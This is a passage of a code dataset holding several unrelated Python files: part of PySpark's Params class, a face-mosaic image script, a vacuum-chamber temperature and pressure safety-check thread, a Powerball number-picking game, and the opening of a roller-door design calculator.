in src_params:\n setattr(self, name, param._copy_new_parent(self))\n\n @property\n def params(self) -> List[Param]:\n \"\"\"\n Returns all params ordered by name. The default implementation\n uses :py:func:`dir` to get all attributes of type\n :py:class:`Param`.\n \"\"\"\n if self._params is None:\n self._params = list(\n filter(\n lambda attr: isinstance(attr, Param),\n [\n getattr(self, x)\n for x in dir(self)\n if x != \"params\" and not isinstance(getattr(type(self), x, None), property)\n ],\n )\n )\n return self._params\n\n def explainParam(self, param: Union[str, Param]) -> str:\n \"\"\"\n Explains a single param and returns its name, doc, and optional\n default value and user-supplied value in a string.\n \"\"\"\n param = self._resolveParam(param)\n values = []\n if self.isDefined(param):\n if param in self._defaultParamMap:\n values.append(\"default: %s\" % self._defaultParamMap[param])\n if param in self._paramMap:\n values.append(\"current: %s\" % self._paramMap[param])\n else:\n values.append(\"undefined\")\n valueStr = \"(\" + \", \".join(values) + \")\"\n return \"%s: %s %s\" % (param.name, param.doc, valueStr)\n\n def explainParams(self) -> str:\n \"\"\"\n Returns the documentation of all params with their optionally\n default values and user-supplied values.\n \"\"\"\n return \"\\n\".join([self.explainParam(param) for param in self.params])\n\n def getParam(self, paramName: str) -> Param:\n \"\"\"\n Gets a param by its name.\n \"\"\"\n param = getattr(self, paramName)\n if isinstance(param, Param):\n return param\n else:\n raise ValueError(\"Cannot find param with name %s.\" % paramName)\n\n def isSet(self, param: Union[str, Param[Any]]) -> bool:\n \"\"\"\n Checks whether a param is explicitly set by user.\n \"\"\"\n param = self._resolveParam(param)\n return param in self._paramMap\n\n def hasDefault(self, param: Union[str, Param[Any]]) -> bool:\n \"\"\"\n Checks whether a param has a default value.\n \"\"\"\n param = self._resolveParam(param)\n return param in self._defaultParamMap\n\n def isDefined(self, param: Union[str, Param[Any]]) -> bool:\n \"\"\"\n Checks whether a param is explicitly set by user or has\n a default value.\n \"\"\"\n return self.isSet(param) or self.hasDefault(param)\n\n def hasParam(self, paramName: str) -> bool:\n \"\"\"\n Tests whether this instance contains a param with a given\n (string) name.\n \"\"\"\n if isinstance(paramName, str):\n p = getattr(self, paramName, None)\n return isinstance(p, Param)\n else:\n raise TypeError(\"hasParam(): paramName must be a string\")\n\n @overload\n def getOrDefault(self, param: str) -> Any:\n ...\n\n @overload\n def getOrDefault(self, param: Param[T]) -> T:\n ...\n\n def getOrDefault(self, param: Union[str, Param[T]]) -> Union[Any, T]:\n\n \"\"\"\n Gets the value of a param in the user-supplied param map or its\n default value. Raises an error if neither is set.\n \"\"\"\n param = self._resolveParam(param)\n if param in self._paramMap:\n return self._paramMap[param]\n else:\n return self._defaultParamMap[param]\n\n def extractParamMap(self, extra: Optional[\"ParamMap\"] = None) -> \"ParamMap\":\n \"\"\"\n Extracts the embedded default param values and user-supplied\n values, and then merges them with extra values from input into\n a flat param map, where the latter value is used if there exist\n conflicts, i.e., with ordering: default param values <\n user-supplied values < extra.\n\n Parameters\n ----------\n extra : dict, optional\n extra param values\n\n Returns\n -------\n dict\n merged param map\n \"\"\"\n if extra is None:\n extra = dict()\n paramMap = self._defaultParamMap.copy()\n paramMap.update(self._paramMap)\n paramMap.update(extra)\n return paramMap\n\n def copy(self: P, extra: Optional[\"ParamMap\"] = None) -> P:\n \"\"\"\n Creates a copy of this instance with the same uid and some\n extra params. The default implementation creates a\n shallow copy using :py:func:`copy.copy`, and then copies the\n embedded and extra parameters over and returns the copy.\n Subclasses should override this method if the default approach\n is not sufficient.\n\n Parameters\n ----------\n extra : dict, optional\n Extra parameters to copy to the new instance\n\n Returns\n -------\n :py:class:`Params`\n Copy of this instance\n \"\"\"\n if extra is None:\n extra = dict()\n that = copy.copy(self)\n that._paramMap = {}\n that._defaultParamMap = {}\n return self._copyValues(that, extra)\n\n def set(self, param: Param, value: Any) -> None:\n \"\"\"\n Sets a parameter in the embedded param map.\n \"\"\"\n self._shouldOwn(param)\n try:\n value = param.typeConverter(value)\n except ValueError as e:\n raise ValueError('Invalid param value given for param \"%s\". %s' % (param.name, e))\n self._paramMap[param] = value\n\n def _shouldOwn(self, param: Param) -> None:\n \"\"\"\n Validates that the input param belongs to this Params instance.\n \"\"\"\n if not (self.uid == param.parent and self.hasParam(param.name)):\n raise ValueError(\"Param %r does not belong to %r.\" % (param, self))\n\n def _resolveParam(self, param: Union[str, Param]) -> Param:\n \"\"\"\n Resolves a param and validates the ownership.\n\n Parameters\n ----------\n param : str or :py:class:`Param`\n param name or the param instance, which must\n belong to this Params instance\n\n Returns\n -------\n :py:class:`Param`\n resolved param instance\n \"\"\"\n if isinstance(param, Param):\n self._shouldOwn(param)\n return param\n elif isinstance(param, str):\n return self.getParam(param)\n else:\n raise TypeError(\"Cannot resolve %r as a param.\" % param)\n\n def _testOwnParam(self, param_parent: str, param_name: str) -> bool:\n \"\"\"\n Test the ownership. Return True or False\n \"\"\"\n return self.uid == param_parent and self.hasParam(param_name)\n\n @staticmethod\n def _dummy() -> \"Params\":\n \"\"\"\n Returns a dummy Params instance used as a placeholder to\n generate docs.\n \"\"\"\n dummy = Params()\n dummy.uid = \"undefined\"\n return dummy\n\n def _set(self: P, **kwargs: Any) -> P:\n \"\"\"\n Sets user-supplied params.\n \"\"\"\n for param, value in kwargs.items():\n p = getattr(self, param)\n if value is not None:\n try:\n value = p.typeConverter(value)\n except TypeError as e:\n raise TypeError('Invalid param value given for param \"%s\". %s' % (p.name, e))\n self._paramMap[p] = value\n return self\n\n def clear(self, param: Param) -> None:\n \"\"\"\n Clears a param from the param map if it has been explicitly set.\n \"\"\"\n if self.isSet(param):\n del self._paramMap[param]\n\n def _setDefault(self: P, **kwargs: Any) -> P:\n \"\"\"\n Sets default params.\n \"\"\"\n for param, value in kwargs.items():\n p = getattr(self, param)\n if value is not None and not isinstance(value, JavaObject):\n try:\n value = p.typeConverter(value)\n except TypeError as e:\n raise TypeError(\n 'Invalid default param value given for param \"%s\". %s' % (p.name, e)\n )\n self._defaultParamMap[p] = value\n return self\n\n def _copyValues(self, to: P, extra: Optional[\"ParamMap\"] = None) -> P:\n \"\"\"\n Copies param values from this instance to another instance for\n params shared by them.\n\n Parameters\n ----------\n to : :py:class:`Params`\n the target instance\n extra : dict, optional\n extra params to be copied\n\n Returns\n -------\n :py:class:`Params`\n the target instance with param values copied\n \"\"\"\n paramMap = self._paramMap.copy()\n if isinstance(extra, dict):\n for param, value in extra.items():\n if isinstance(param, Param):\n paramMap[param] = value\n else:\n raise TypeError(\n \"Expecting a valid instance of Param, but received: {}\".format(param)\n )\n elif extra is not None:\n raise TypeError(\n \"Expecting a dict, but received an object of type {}.\".format(type(extra))\n )\n for param in self.params:\n # copy default params\n if param in self._defaultParamMap and to.hasParam(param.name):\n to._defaultParamMap[to.getParam(param.name)] = self._defaultParamMap[param]\n # copy explicitly set params\n if param in paramMap and to.hasParam(param.name):\n to._set(**{param.name: paramMap[param]})\n return to\n\n def _resetUid(self: P, newUid: Any) -> P:\n \"\"\"\n Changes the uid of this instance. This updates both\n the stored uid and the parent uid of params and param maps.\n This is used by persistence (loading).\n\n Parameters\n ----------\n newUid\n new uid to use, which is converted to unicode\n\n Returns\n -------\n :py:class:`Params`\n same instance, but with the uid and Param.parent values\n updated, including within param maps\n \"\"\"\n newUid = str(newUid)\n self.uid = newUid\n newDefaultParamMap = dict()\n newParamMap = dict()\n for param in self.params:\n newParam = copy.copy(param)\n newParam.parent = newUid\n if param in self._defaultParamMap:\n newDefaultParamMap[newParam] = self._defaultParamMap[param]\n if param in self._paramMap:\n newParamMap[newParam] = self._paramMap[param]\n param.parent = newUid\n self._defaultParamMap = newDefaultParamMap\n self._paramMap = newParamMap\n return self\n","sub_path":"python/pyspark/ml/param/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"484604158","text":"import cv2\nfrom pathlib import Path\nimport time\nimport os\nimport psutil\n\nIMAGE_PATH = \"/Users/hinoueyuuya/大学/4年前期/並列分散処理/最終課題/man\"\n\ndef mosaic(src, ratio=0.1):\n small = cv2.resize(src, None, fx=ratio, fy=ratio, interpolation=cv2.INTER_NEAREST)\n return cv2.resize(small, src.shape[:2][::-1], interpolation=cv2.INTER_NEAREST)\n\ndef mosaic_area(src, x, y, width, height, ratio=0.1):\n dst = src.copy()\n dst[y:y + height, x:x + width] = mosaic(dst[y:y + height, x:x + width], ratio)\n return dst\n\ndef main():\n \"\"\" 100枚の画像から、100枚のモザイク処理した画像を生成する \"\"\"\n files = Path(IMAGE_PATH + \"/original/\").glob(\"*\")\n for file in files:\n src = cv2.imread(str(file))\n cascade_path = '/Users/hinoueyuuya/opt/anaconda3/lib/python3.7/site-packages/cv2/data/haarcascade_frontalface_default.xml'\n cascade = cv2.CascadeClassifier(cascade_path)\n src_gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n faces = cascade.detectMultiScale(src_gray)\n for x, y, w, h in faces:\n dst = mosaic_area(src, x, y, w, h)\n cv2.imwrite(IMAGE_PATH + \"/mosaic/\" + file.name, dst)\n\nif __name__ == \"__main__\":\n start = time.time()\n main()\n end = time.time()\n mem = psutil.virtual_memory() \n print(\"メモリの使用率は\" + str(mem.percent))\n cpu = psutil.cpu_percent(interval=1)\n print(\"CPUの使用率は\" + str(cpu))\n print(\"Finished in {} seconds.\".format(end-start))","sub_path":"image2mosaic.py","file_name":"image2mosaic.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"449620171","text":"from threading import Thread\nimport time\nfrom datetime import datetime\nimport os\n\nfrom Collections.HardwareStatusInstance import HardwareStatusInstance\nfrom Collections.ProfileInstance import ProfileInstance\nfrom Logging.MySql import MySQlConnect\nfrom Logging.Logging import Logging\n\n\ndef releaseHoldThread():\n ProfileInstance.getInstance().inHold = False\n sql = \"UPDATE System_Status SET in_hold=0;\"\n mysql = MySQlConnect()\n try:\n mysql.cur.execute(sql)\n mysql.conn.commit()\n except Exception as e:\n Logging.debugPrint(3, \"sql: {}\".format(sql))\n Logging.debugPrint(1, \"Error in ThreadCollection, holdThread: {}\".format(str(e)))\n if Logging.debug:\n raise e\n\n\nclass SafetyCheck(Thread):\n \"\"\"\n SafetyCheck is the thread that runs the sainty and safety checks over the system.\n If it finds anything wrong with the the system it makes an error report and stores it in a queue\n to be seen by the client.\n \"\"\"\n __instance = None\n\n def __init__(self, parent):\n if SafetyCheck.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n Logging.logEvent(\"Debug\", \"Status Update\",\n {\"message\": \"Creating SafetyCheck\",\n \"level\": 2})\n self.errorList = []\n self.errorDict = {\n \"System Alarm: High Temperature\": False,\n \"Product Saver Alarm: High Temperature\": False,\n \"Product Saver Alarm: Low Temperature\": False,\n \"Human Touch Alarm: High Temperature\": False,\n \"Human Touch Alarm: Low Temperature\": False,\n \"Raised Pressure While Testing\": False,\n }\n\n self.MAX_UUT_TEMP = {}\n self.MIN_UUT_TEMP = {}\n\n SafetyCheck.__instance = self\n self.parent = parent\n super(SafetyCheck, self).__init__()\n\n def run(self):\n # This should always stay on\n while True:\n # initialization of the safety Thread\n try:\n # Temps are in Kelvin\n MAX_OPERATING_TEMP = 437\n # safe at all lower bounds\n # MIN_OPERATING_TEMP\n\n MAX_TOUCH_TEMP = 318.15\n MIN_TOUCH_TEMP = 269.15\n\n # TODO, make this user defined\n # These are test values, they will change when the code is written to change them\n self.MAX_UUT_TEMP = {}\n self.MIN_UUT_TEMP = {}\n\n SLEEP_TIME = 1 # in seconds\n\n # Used to keep track of the first time through a loop\n vacuum = False\n\n hardwareStatusInstance = HardwareStatusInstance.getInstance()\n\n Logging.logEvent(\"Debug\", \"Status Update\",\n {\"message\": \"Starting Safety Checker Thread\",\n \"level\": 3})\n # stop when the program ends\n while True:\n Logging.logEvent(\"Debug\", \"Status Update\",\n {\"message\": \"Running Safety Checker Thread\",\n \"level\": 4})\n\n tempErrorDict = {\n \"System Alarm: High Temperature\": False,\n \"Product Saver Alarm: High Temperature\": False,\n \"Product Saver Alarm: Low Temperature\": False,\n \"Human Touch Alarm: High Temperature\": False,\n \"Human Touch Alarm: Low Temperature\": False,\n \"Pressure Loss In Profile\": False,\n }\n TCs = hardwareStatusInstance.Thermocouples.ValidTCs\n for tc in TCs:\n # if there are any TC's higher than max temp\n if tc.temp > MAX_OPERATING_TEMP:\n # print(\"{}-> {}\".format(tc.Thermocouple, tc.temp))\n errorDetail = \"TC # {} is above MAX_OPERATING_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple, MAX_OPERATING_TEMP, tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"System Alarm: High Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Turned off heater\", \"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n\n d_out = HardwareStatusInstance.getInstance().PC_104.digital_out\n ProfileInstance.getInstance().activeProfile = False\n Logging.debugPrint(1, \"ERROR Heat was above max operating temperature ({})\".format(tc.temp))\n vacuum = False\n d_out.update({\"IR Lamp 1 PWM DC\": 0})\n d_out.update({\"IR Lamp 2 PWM DC\": 0})\n d_out.update({\"IR Lamp 3 PWM DC\": 0})\n d_out.update({\"IR Lamp 4 PWM DC\": 0})\n d_out.update({\"IR Lamp 5 PWM DC\": 0})\n d_out.update({\"IR Lamp 6 PWM DC\": 0})\n d_out.update({\"IR Lamp 7 PWM DC\": 0})\n d_out.update({\"IR Lamp 8 PWM DC\": 0})\n d_out.update({\"IR Lamp 9 PWM DC\": 0})\n d_out.update({\"IR Lamp 10 PWM DC\": 0})\n d_out.update({\"IR Lamp 11 PWM DC\": 0})\n d_out.update({\"IR Lamp 12 PWM DC\": 0})\n d_out.update({\"IR Lamp 13 PWM DC\": 0})\n d_out.update({\"IR Lamp 14 PWM DC\": 0})\n d_out.update({\"IR Lamp 15 PWM DC\": 0})\n d_out.update({\"IR Lamp 16 PWM DC\": 0})\n\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Shroud Duty Cycle', 0])\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Platen Duty Cycle', 0])\n\n releaseHoldThread()\n # end of max operational test\n\n if tc.userDefined:\n # print(\"tc: {} zone: {}\".format(tc.Thermocouple,tc.zone))\n if tc.zone != 0:\n if tc.temp > ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).maxHeatError:\n errorDetail = \"TC # {} is above MAX_UUT_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple,\n ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).maxHeatError,\n tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Product Saver Alarm: High Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Turned off heater\", \"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of max user test\n\n if tc.temp < ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).minHeatError:\n errorDetail = \"TC # {} is below MIN_UUT_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple,\n ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).minHeatError,\n tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Product Saver Alarm: Low Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Turned off LN flow\", \"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of min user test\n # end of user test\n\n # Get the full list\n OutsideThermoCouples = []\n if tc.Thermocouple in OutsideThermoCouples:\n if tc.temp > MAX_TOUCH_TEMP:\n errorDetail = \"TC # {} is above MAX_TOUCH_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple, MAX_TOUCH_TEMP, tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Human Touch Alarm: High Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of max touch test\n\n if tc.temp < MIN_TOUCH_TEMP:\n errorDetail = \"TC # {} is below MIN_TOUCH_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple, MIN_TOUCH_TEMP, tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Human Touch Alarm: Low Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of min touch test\n # if of outside thermaltest\n # End of TC for loop\n\n for errorType in self.errorDict:\n # for every type of error\n if self.errorDict[errorType] and not tempErrorDict[errorType]:\n # It was true and now is not, log it.\n\n # make a event log\n errorLog = {\n \"time\": str(datetime.now()),\n \"event\": errorType,\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": \"The current event has ended\",\n \"actions\": [\"Log Event\"]\n }\n self.logEvent(errorLog)\n\n self.errorDict = tempErrorDict\n\n # Logging if you've entered operational vacuum, and then left it\n # TODO: OperationalVacuum can't be updated if there isn't an active profile...this needs to change\n if HardwareStatusInstance.getInstance().OperationalVacuum:\n vacuum = True\n\n if os.name == \"posix\":\n userName = os.environ['LOGNAME']\n else:\n userName = \"user\"\n if \"root\" in userName:\n if vacuum and HardwareStatusInstance.getInstance().PfeifferGuages.get_chamber_pressure() > 1e-4:\n d_out = HardwareStatusInstance.getInstance().PC_104.digital_out\n ProfileInstance.getInstance().activeProfile = False\n Logging.debugPrint(1, \"ERROR Pressure is above 10^-4. ({})\".format(\n HardwareStatusInstance.getInstance().PfeifferGuages.get_chamber_pressure()))\n vacuum = False\n # TODO: Send Error\n d_out.update({\"IR Lamp 1 PWM DC\": 0})\n d_out.update({\"IR Lamp 2 PWM DC\": 0})\n d_out.update({\"IR Lamp 3 PWM DC\": 0})\n d_out.update({\"IR Lamp 4 PWM DC\": 0})\n d_out.update({\"IR Lamp 5 PWM DC\": 0})\n d_out.update({\"IR Lamp 6 PWM DC\": 0})\n d_out.update({\"IR Lamp 7 PWM DC\": 0})\n d_out.update({\"IR Lamp 8 PWM DC\": 0})\n d_out.update({\"IR Lamp 9 PWM DC\": 0})\n d_out.update({\"IR Lamp 10 PWM DC\": 0})\n d_out.update({\"IR Lamp 11 PWM DC\": 0})\n d_out.update({\"IR Lamp 12 PWM DC\": 0})\n d_out.update({\"IR Lamp 13 PWM DC\": 0})\n d_out.update({\"IR Lamp 14 PWM DC\": 0})\n d_out.update({\"IR Lamp 15 PWM DC\": 0})\n d_out.update({\"IR Lamp 16 PWM DC\": 0})\n\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Shroud Duty Cycle', 0])\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Platen Duty Cycle', 0])\n\n releaseHoldThread()\n\n # end if vacuum in bad condintion\n # end if root\n time.sleep(SLEEP_TIME)\n # end of inner while true loop\n except Exception as e:\n Logging.debugPrint(1, \"Error in Safety Checker: {}\".format(str(e)))\n if Logging.debug:\n raise e\n time.sleep(SLEEP_TIME)\n # end of try/except\n\n # end of outer while true\n # end of run()\n\n def logEvent(self, error):\n errorInList = False\n if self.errorList:\n for tempError in self.errorList:\n if error[\"event\"] == tempError[\"event\"]:\n if error[\"item\"] == tempError[\"item\"]:\n if error['itemID'] == tempError['itemID']:\n errorInList = True\n if not errorInList:\n # debugPrint(1, error[\"details\"])\n self.errorList.append(error)\n # print(self.errorList)\n\n Logging.debugPrint(4, \"Running Safety Checker Thread\")\n # Not sure what to do with this\n if not self.errorDict[error[\"event\"]]:\n # The error has not been on, and is now on\n # Log SQL stuff\n pass\n","sub_path":"Sites/ThreadControls/SafetyCheck.py","file_name":"SafetyCheck.py","file_ext":"py","file_size_in_byte":15582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528815723","text":"\"\"\"\nPowerball story:\nAs a Greenphire employee I would like to add my favorite 6 numbers to consider\nfor a Powerball entry ticket so that I can win 1 billion dollars.\n\n • Capture the name of the employees entering the number.\n • The first 5 favorite numbers will need to be in the range of 1 to 69 and\n unique. (remember that this is a drawing so there cannot be duplicates\n in this range of 5 numbers)\n • 6th favorite number will need to be in the range of 1 to 26 and flagged\n as the 6th Powerball number.\n • Keep count of each individual favorite number provided to determine\n which numbers to use in our final winning number. (i.e. count the\n duplicates).\n • Retrieve the max count of each unique duplicate number and use them as\n the Powerball numbers.\n • if there is a tie based on the max counts randomly select the tied\n number.\n • Display all employees with their corresponding number entries.\n • Display the final Powerball number based on the requirements above.\n\nSample output:\nEnter your first name: Wade\nEnter your last name: Wilson\nselect 1st # (1 thru 69): 12\nselect 2nd # (1 thru 69 excluding 12): 20\nselect 3rd # (1 thru 69 excluding 12 and 20): 23\nselect 4th # (1 thru 69 excluding 12, 20, and 23: 56\nselect 5th # (1 thru 69 excluding 12, 20, 23, and 56: 30\nselect Power Ball # (1 thru 26): 25\n\nWade Wilson 15 26 33 60 34 Powerball: 16\nFrank Castle 15 26 34 56 61 Powerball: 16\n\nPowerball winning number:\n15 26 34 55 63 Powerball: 16\n\"\"\"\nfrom random import shuffle\nfrom random import choice\nfrom random import sample\nfrom collections import Counter\nfrom collections import namedtuple\n\nball_set_69 = [i for i in range(1, 70)]\nball_set_26 = [i for i in range(1, 27)]\n\n\nclass Player():\n\n def __init__(self, first_name=None, last_name=None, white_balls=None,\n power_ball=None):\n if any((first_name is None, last_name is None, white_balls is None,\n power_ball is None)):\n q_vars = {0: 'Select 1st # (1 thru 69): ',\n 1: 'Select 2nd # (1 thru 69 excluding {}): ',\n 2: 'Select 3rd # (1 thru 69 excluding {} and {}): ',\n 3: 'Select 4th # (1 thru 69 excluding {}, {}, and {}): ',\n 4: 'Select 5th # (1 thru 69 excluding {}, {}, {}, and {}): '}\n\n def ask_white_ball_number():\n return input(q_vars[len(self.white_balls)]\n .format(*self.white_balls))\n\n def ask_power_ball_number():\n return input('Select Power Ball # (1 thru 26): ')\n\n def ask_number(question):\n num = question()\n while not num.isnumeric():\n print(\"Please enter number only. Let's try again.\")\n num = question()\n return num\n\n self.first_name = input('Enter your first name: ')\n self.last_name = input('Enter your last name: ')\n self.white_balls = []\n # player is choosing 5 different white balls\n ball = 0\n while len(self.white_balls) < 5:\n while (not int(ball) in ball_set_69 or\n int(ball) in self.white_balls):\n ball = ask_number(ask_white_ball_number)\n self.white_balls.append(int(ball))\n # player is choosing a powerball\n ball = 0\n while not int(ball) in ball_set_26:\n ball = ask_number(ask_power_ball_number)\n self.power_ball = int(ball)\n else:\n self.first_name = first_name\n self.last_name = last_name\n self.white_balls = white_balls\n self.power_ball = power_ball\n\n def __repr__(self):\n return '{} {} - {} {} {} {} {} Powerball: {}'.format(self.first_name,\n self.last_name,\n *self.white_balls,\n self.power_ball)\n\n\nclass PowerBallGame():\n\n def __init__(self, num_of_console_player=1, num_of_random_player=9):\n \"\"\"\n To make testing process for this program is easier I have added the\n facility of random generation of player's data. During the class\n initialiazation you have to indicate how many players will input data\n by console, and how many of test players will be generated randomly\n \"\"\"\n first_names = ['Emma', 'Noah', 'Olivia', 'Liam', 'Sophia', 'Mason',\n 'Ava', 'Jacob', 'Isabella', 'William', 'Mia', 'Ethan',\n 'Abigail', 'James', 'Emily', 'Alexander', 'Charlotte',\n 'Michael', 'Harper', 'Benjamin']\n last_names = ['Smith', 'Johnson', 'Williams', 'Jones', 'Brown',\n 'Davis', 'Miller', 'Wilson', 'Moore', 'Taylor',\n 'Anderson', 'Thomas', 'Jackson', 'White', 'Harris',\n 'Martin', 'Thompson', 'Garcia', 'Martinez', 'Robinson']\n balls_set = namedtuple('set', ['n_times', 'balls'])\n counter_69 = Counter()\n counter_26 = Counter()\n\n self.players = []\n # add players from console\n for i in range(0, num_of_console_player):\n self.players.append(Player())\n # add random players\n for i in range(0, num_of_random_player):\n self.players.append(Player(choice(first_names),\n choice(last_names),\n sample(ball_set_69, 5),\n choice(ball_set_26)))\n # counting of balls ---------------------------------------------------\n for player in self.players:\n # count how many times (n_times) each white ball was selected\n for ball in player.white_balls:\n counter_69[ball] += 1\n # count how many times (n_times) each powerball was selected\n counter_26[player.power_ball] += 1\n\n def list_of_balls(counter):\n # creation of the list of balls sorted in times' of selection descending order\n balls_list = {}\n for ball, n_times in counter.items():\n if n_times in balls_list:\n balls_list[n_times].append(ball)\n else:\n balls_list[n_times] = [ball]\n balls_list = [balls_set(n_times, ball)\n for n_times, ball in balls_list.items()]\n balls_list.sort(key=lambda x: x.n_times, reverse=True)\n return balls_list\n\n self.balls_69_count = list_of_balls(counter_69)\n self.balls_26_count = list_of_balls(counter_26)\n\n # generation of final balls -------------------------------------------\n def add_ball(add_from, add_to):\n balls = list(set(add_from)-set(add_to))\n if len(balls) != 0:\n add_to.append(choice(balls))\n return add_to\n\n final_balls = []\n # choosing of final white balls\n for balls_list in self.balls_69_count:\n # don't take balls which were chosen only once\n if balls_list.n_times != 1:\n # shuffle balls\n shuffle(balls_list.balls)\n for ball in balls_list.balls:\n final_balls.append(ball)\n while len(final_balls) < 5:\n final_balls = add_ball(ball_set_69, final_balls)\n self.final_balls = sorted(final_balls[:5])\n # choosing of final power ball\n if self.balls_26_count[0].n_times == 1:\n self.final_balls.append(choice(ball_set_26))\n else:\n self.final_balls.append(choice(self.balls_26_count[0].balls))\n\n def players_list(self):\n # create formatted list of all players\n max_name_length = max([len(player.first_name) + len(player.last_name)\n for player in self.players])\n border_length = max_name_length + 34\n final_list = '-'*border_length+'\\n'\n for player in self.players:\n # player's first name and last name\n final_list += '{} {} {}- '.format(player.first_name,\n player.last_name,\n ' '*(max_name_length -\n (len(player.first_name) +\n len(player.last_name))))\n # white balls\n final_list += '{} {} {} {} {} '.format(*[ball\n if ball > 9\n else ' '+str(ball)\n for ball\n in player.white_balls])\n # Powerball\n final_list += '- Powerball: {}\\n'.format(player.power_ball\n if player.power_ball > 9\n else ' '+str(player.power_ball))\n final_list += '-'*border_length\n return final_list\n\n def view_final_powerball(self):\n return ('Powerball winning numbers:\\n'\n '{} {} {} {} {} Powerball: {}').format(*self.final_balls)\n\n\nif __name__ == '__main__':\n # you can set number of players like this: PowerBallGame(2, 8)\n # 2 players from console and 8 randomly generated\n game = PowerBallGame()\n print(game.players_list())\n print(game.view_final_powerball())\n # Additional info\n print('\\n\\nBalls count information (white balls):')\n print('- '*25)\n print(*game.balls_69_count, sep='\\n')\n print('\\nBalls count information (powerball):')\n print('- '*25)\n print(*game.balls_26_count, sep='\\n')\n","sub_path":"powerball.py","file_name":"powerball.py","file_ext":"py","file_size_in_byte":9921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372884844","text":"'''This program calculates roller door design parameters based on drum diameter, slat size and installed height, motor etc.'''\n\nimport math\n\n#Input Geometry:\ndoor_number = 62\ndescription = 'Maintenance shop'\nopening_height = 4820 #(mm)\nopening_width = 8256 #(mm)\ndrum_height= 5000 #(mm)\n\ndrum_type = 1 #enter 1 or 2 for 219x9.5 or 219x12.7 drums respectively\nslat_type = 2 #enter 1,2 or 3 for 75,100 or 125 slats respectively\nbrake_type = 1 #enter 1 or 2 for FG-120-50 or FG220-60 respectively\ndrive_sprocket_type = 1\nchainwheel_type = 3\nmotor_type = 2\n\nbottom_rail = 3 #(kg/m)\nslat_info = {1:[75,40, 'NA'], 2:[100,46,15], 3:[125,46,'NA']} #slat_type[slat length, slat dia. buildup/roll, weight/m^2]\ndrum_info = {1:[219,9.5], 2:[219,12.7]} #drum_type [OD, t, weight/m (kg)]\nbrake_info = {1:['FG-120-50',3.53, 50,], 2:['FG220-60', 6.7]} #brake_type [brake name, max. braking torque(kN.m), axle dia. (mm), weight (kg)]\nsprocket_info = {1:[15], 2: [38], 3: [45]} #chainwheel_type[sprocket teeth, pitch (mm), thickness (mm)]\nmotor_info = {1:['KE40.24', 400, 28], 2:['KE60.24', 600, 47], 3:['KE80.24',800,49]} #motor type [part, output torque (N.m), weight (kg)]\n\nprint('Door Number = ',door_number,'\\nDescription = ',description)\n\n\ndef curtain (slat_info, drum_height, drum_info, opening_width, bottom_rail):\n #Get required data\n f_sy=250 #(MPa)\n slat_geom = slat_info.get(slat_type) #print(slat_geom)\n slat_increase = slat_geom[1] #print(slat_increase)\n slat_weight = slat_geom[2]\n drum_geom = drum_info.get(drum_type)\n drum_OD = drum_geom[0]\n drum_t = drum_geom[1]\n drum_ID = drum_OD-2*drum_t\n #drum_unitweight = drum_geom[2]\n drum_unitweight = ((math.pi*((drum_OD**2)-(drum_ID**2)))/4)*7850*1e-6\n #print('Drum unit weight=', drum_unitweight)\n\n #---Calculate circumference for each roll until the required length is achieved---#\n rolled_length=0\n x=slat_increase\n i=1 #number of turns on drum\n while drum_height >= rolled_length:\n dia_curtain = drum_OD+(i*x)\n circumference = math.pi*dia_curtain\n rolled_length = rolled_length + circumference\n #print('Turn No. =', i)\n #print ('Rolled length =',rolled_length)\n #print('Rolled Curtain Diameter =',dia_curtain)\n i+=1\n excess = rolled_length-drum_height #amount of roll left on drum when door reaches the ground.\n\n #---Calculate Drum and Curtain Weights and Check Drum Strength ---#\n drum_mass = drum_unitweight*opening_width*1e-3*(9.81/1000) #(kN)\n curtain_mass = ((rolled_length*opening_width* 1e-6 * slat_weight)+(opening_width*1e-3*bottom_rail))*(9.81/1000) # (kN)\n #Check drum for service and 